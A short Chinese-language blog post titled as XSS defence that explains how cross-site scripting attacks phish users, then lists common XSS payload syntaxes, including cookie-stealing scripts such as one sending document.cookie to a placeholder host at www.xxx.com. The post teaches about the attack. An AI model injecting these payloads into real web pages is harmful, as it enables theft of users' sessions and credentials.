close

XSS防禦方式http://anti-hacker.blogspot.com/2008/11/xss.html

Cross Site Scripting vulnerability (XSS)跨網站攻擊:

跨網頁攻擊是利用動態網頁的特性、網頁中的程式錯誤,以及利用開發者沒有嚴格限制回傳參數及過濾輸入之特殊字元,將具攻擊性的JavaScriptVB ScriptActiveX,或FLASH程式碼置入而所進行的攻擊。攻擊者必須利用跨網頁攻擊的特性以社交工程的方式,讓被攻擊者上勾。

首先,攻擊者會找尋目標,利用簡單的檢測手法[ alert(‘Hello') ]尋找擁有此弱點的網站。然後,攻擊者便可建立跟原本的網頁很類似的網頁登入畫面在自己的伺服器上,最後,再將包裝好的URL以社交工程手法,欺騙使用者上勾。待成功攻擊之後,攻擊者便可利用蒐集來的帳號和密碼進行資料竊取。

 

各種 XSS 常見攻擊語法

<script>[code]</script>
<body onload="[code]">
<a href="javasript:[code]">
<img src="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
<img src=&{[code]};>
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<iframe src="vbscript:[code]">
<a href="about:<sript>[code]</script>">
<xml src="javascript: [code]">
<script>alert(document.cookie)</script>
<script>document.write(document.cookie);</script>
<script>document.location='http://www.xxx.com/cookie.php?cookie='+escape(document.cookie) </script>
[code] = 例如: alert(“Hello World”)

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 11 的頭像
    11

    冠霖的部落格

    11 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄